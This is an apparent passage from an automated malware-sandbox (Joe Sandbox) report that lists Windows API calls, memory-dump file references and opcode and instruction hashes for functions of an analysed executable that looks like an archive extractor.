                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 2480d2d2206bbd4db344d8037e2fa50497aadd6087c446a9fe4fa2785417c45a
                                                                                                                                          • Instruction ID: 4518f643465fbdd2268af2b95493cf15bac83b27e0bb35a1eb0aa05e76cae15b
                                                                                                                                          • Opcode Fuzzy Hash: 2480d2d2206bbd4db344d8037e2fa50497aadd6087c446a9fe4fa2785417c45a
                                                                                                                                          • Instruction Fuzzy Hash: 17A012C15995857C700821009C02C7F010CC2C1F60330442DF506808926C400C412470
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE51F
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: fcd2867a6b3a0d6401f7e5dc0f476d00cc4b482d91ba4665760aa45a2b14e2eb
                                                                                                                                          • Instruction ID: 4518f643465fbdd2268af2b95493cf15bac83b27e0bb35a1eb0aa05e76cae15b
                                                                                                                                          • Opcode Fuzzy Hash: fcd2867a6b3a0d6401f7e5dc0f476d00cc4b482d91ba4665760aa45a2b14e2eb
                                                                                                                                          • Instruction Fuzzy Hash: 17A012C15995857C700821009C02C7F010CC2C1F60330442DF506808926C400C412470
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE51F
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 4d263afcb343334594e3df5b1bf65f285dba497a0d0e6407a79317b8a76836ac
                                                                                                                                          • Instruction ID: 4518f643465fbdd2268af2b95493cf15bac83b27e0bb35a1eb0aa05e76cae15b
                                                                                                                                          • Opcode Fuzzy Hash: 4d263afcb343334594e3df5b1bf65f285dba497a0d0e6407a79317b8a76836ac
                                                                                                                                          • Instruction Fuzzy Hash: 17A012C15995857C700821009C02C7F010CC2C1F60330442DF506808926C400C412470
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE51F
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: bae464d1386c5633b0177e996b955ba3a3d23f3ca3be3ac7798b0c8a8dc4ef59
                                                                                                                                          • Instruction ID: 4518f643465fbdd2268af2b95493cf15bac83b27e0bb35a1eb0aa05e76cae15b
                                                                                                                                          • Opcode Fuzzy Hash: bae464d1386c5633b0177e996b955ba3a3d23f3ca3be3ac7798b0c8a8dc4ef59
                                                                                                                                          • Instruction Fuzzy Hash: 17A012C15995857C700821009C02C7F010CC2C1F60330442DF506808926C400C412470
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE580
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 60d0b25eaded491e2de1844573bbf62c6f87efc4db9749d1bcfac4e9096494ad
                                                                                                                                          • Instruction ID: 8c2136a6709102cae784fc9b3fc5ddeaf498513ada7b1d37ffdf835cd8b914eb
                                                                                                                                          • Opcode Fuzzy Hash: 60d0b25eaded491e2de1844573bbf62c6f87efc4db9749d1bcfac4e9096494ad
                                                                                                                                          • Instruction Fuzzy Hash: DEA012C11D42883C700821609C02C7B050CC1C0F21330412DF505848916C4008412470
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE580
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: c1bfc3aeb8d46a76a5973ea65be785545883e5b16fcc6959c775ae5caa4777ad
                                                                                                                                          • Instruction ID: 265c2c849dc50c92ed7829a11fd8b411cd0a306cb6bcc7b1c7b4429572f224d5
                                                                                                                                          • Opcode Fuzzy Hash: c1bfc3aeb8d46a76a5973ea65be785545883e5b16fcc6959c775ae5caa4777ad
                                                                                                                                          • Instruction Fuzzy Hash: 41A012C11982897C700821509C02C7B010CC1C0F60330442DF506848916C4008412470
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FE580
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                          • Opcode ID: 0493105f63a431fa8d2339cc3b20c47ae74f13d12ad00b042c51502af9ad5426
                                                                                                                                          • Instruction ID: 265c2c849dc50c92ed7829a11fd8b411cd0a306cb6bcc7b1c7b4429572f224d5
                                                                                                                                          • Opcode Fuzzy Hash: 0493105f63a431fa8d2339cc3b20c47ae74f13d12ad00b042c51502af9ad5426
                                                                                                                                          • Instruction Fuzzy Hash: 41A012C11982897C700821509C02C7B010CC1C0F60330442DF506848916C4008412470
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • SetEndOfFile.KERNELBASE(?,000E903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 000E9F0C
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 749574446-0
                                                                                                                                          • Opcode ID: 542151784e0e7417e61ddd065a2502c67510760dcfd5e5f526e8658463b99e67
                                                                                                                                          • Instruction ID: 98683c4d16826fe6eeaa6e7d9ac3ec1e2cbcb161535bf0da3a5c27aa97bc1a96
                                                                                                                                          • Opcode Fuzzy Hash: 542151784e0e7417e61ddd065a2502c67510760dcfd5e5f526e8658463b99e67
                                                                                                                                          • Instruction Fuzzy Hash: B1A0113008000A8A8E002B30CA0808C3B20EB20BC030082A8A00ACA8A2CB22888B8A00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,000FAE72,C:\Users\user\Desktop,00000000,0012946A,00000006), ref: 000FAC08
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1611563598-0
                                                                                                                                          • Opcode ID: 943cdb37ca30b28584797aed8a33957d85886b12992cea94dc217ebe87ef27e4
                                                                                                                                          • Instruction ID: f5821c182bb2b07d4b669b5907bd20500d03da108aedb81fb884496ba13611b0
                                                                                                                                          • Opcode Fuzzy Hash: 943cdb37ca30b28584797aed8a33957d85886b12992cea94dc217ebe87ef27e4
                                                                                                                                          • Instruction Fuzzy Hash: 5FA01130208200AB8A000B328F0AA8EBAAAAFA2B20F00C028A00080030CB30C8A0AA00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000E1316: GetDlgItem.USER32(00000000,00003021), ref: 000E135A
                                                                                                                                            • Part of subcall function 000E1316: SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370
                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 000FC2B1
                                                                                                                                          • EndDialog.USER32(?,00000006), ref: 000FC2C4
                                                                                                                                          • GetDlgItem.USER32(?,0000006C), ref: 000FC2E0
                                                                                                                                          • SetFocus.USER32(00000000), ref: 000FC2E7
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 000FC321
                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 000FC358
                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 000FC36E
                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000FC38C
                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 000FC39C
                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 000FC3B8
                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 000FC3D4
                                                                                                                                          • _swprintf.LIBCMT ref: 000FC404
                                                                                                                                            • Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5
                                                                                                                                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 000FC417
                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 000FC41E
                                                                                                                                          • _swprintf.LIBCMT ref: 000FC477
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 000FC48A
                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 000FC4A7
                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 000FC4C7
                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 000FC4D7
                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 000FC4F1
                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 000FC509
                                                                                                                                          • _swprintf.LIBCMT ref: 000FC535
                                                                                                                                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 000FC548
                                                                                                                                          • _swprintf.LIBCMT ref: 000FC59C
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 000FC5AF
                                                                                                                                            • Part of subcall function 000FAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 000FAF35
                                                                                                                                            • Part of subcall function 000FAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0011E72C,?,?), ref: 000FAF84
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                          • API String ID: 797121971-1840816070
                                                                                                                                          • Opcode ID: 1a680cb679685fca06a99e9b1056eb44edb5f3320227269f0dc3f4b6c9691c56
                                                                                                                                          • Instruction ID: 94d5f4aedce292b8c2bf8c13b51ddbe7a1ae2362947df8950731e69ddfa44ec0
                                                                                                                                          • Opcode Fuzzy Hash: 1a680cb679685fca06a99e9b1056eb44edb5f3320227269f0dc3f4b6c9691c56
                                                                                                                                          • Instruction Fuzzy Hash: 5891A67214834CBFE261DBA0CD4AFFB77ECEB8AB00F004819B749D6491D775AA449762
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000E6FAA
                                                                                                                                          • _wcslen.LIBCMT ref: 000E7013
                                                                                                                                          • _wcslen.LIBCMT ref: 000E7084
                                                                                                                                            • Part of subcall function 000E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 000E7AAB
                                                                                                                                            • Part of subcall function 000E7A9C: GetLastError.KERNEL32 ref: 000E7AF1
                                                                                                                                            • Part of subcall function 000E7A9C: CloseHandle.KERNEL32(?), ref: 000E7B00
                                                                                                                                            • Part of subcall function 000EA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,000E977F,?,?,000E95CF,?,?,?,?,?,00112641,000000FF), ref: 000EA1F1
                                                                                                                                            • Part of subcall function 000EA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,000E977F,?,?,000E95CF,?,?,?,?,?,00112641), ref: 000EA21F
                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 000E7139
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 000E7155
                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 000E7298
                                                                                                                                            • Part of subcall function 000E9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000E73BC,?,?,?,00000000), ref: 000E9DBC
                                                                                                                                            • Part of subcall function 000E9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 000E9E70
                                                                                                                                            • Part of subcall function 000E9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,000E95D6,?,?,?,?,?,00112641,000000FF), ref: 000E963B
                                                                                                                                            • Part of subcall function 000EA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000EA325,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA501
                                                                                                                                            • Part of subcall function 000EA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000EA325,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA532
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                                                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                          • API String ID: 2821348736-3508440684
                                                                                                                                          • Opcode ID: dc3649c53b1a4cad16693a4d9285833752e9661c59ebba470e71d06586af8ab7
                                                                                                                                          • Instruction ID: a0ccedbbf6ffade053c0a6cd3dc39bdf1f2c5b03bc29c241865b43e850049094
                                                                                                                                          • Opcode Fuzzy Hash: dc3649c53b1a4cad16693a4d9285833752e9661c59ebba470e71d06586af8ab7
                                                                                                                                          • Instruction Fuzzy Hash: 25C1E371904684AEDB25DB75DD81FEEB7A8AF18300F00455AFA5AF3182D770AB84CB61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000FF844
                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 000FF910
                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000FF930
                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 000FF93A
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                          • Opcode ID: aae49de60ecfa7ef38f53de0a0f3f934fe1969a81208de14af3bdfa6b371e1b4
                                                                                                                                          • Instruction ID: d0088040985fa3749278a2b421d3532d88b98ea18907331613af91f19073fd7e
                                                                                                                                          • Opcode Fuzzy Hash: aae49de60ecfa7ef38f53de0a0f3f934fe1969a81208de14af3bdfa6b371e1b4
                                                                                                                                          • Instruction Fuzzy Hash: 7B314975D0521DABDF21DFA4D9897DCBBF8AF08300F1041AAE50CAB250EB719B849F05
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • VirtualQuery.KERNEL32(80000000,000FE5E8,0000001C,000FE7DD,00000000,?,?,?,?,?,?,?,000FE5E8,00000004,00141CEC,000FE86D), ref: 000FE6B4
                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,000FE5E8,00000004,00141CEC,000FE86D), ref: 000FE6CF
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
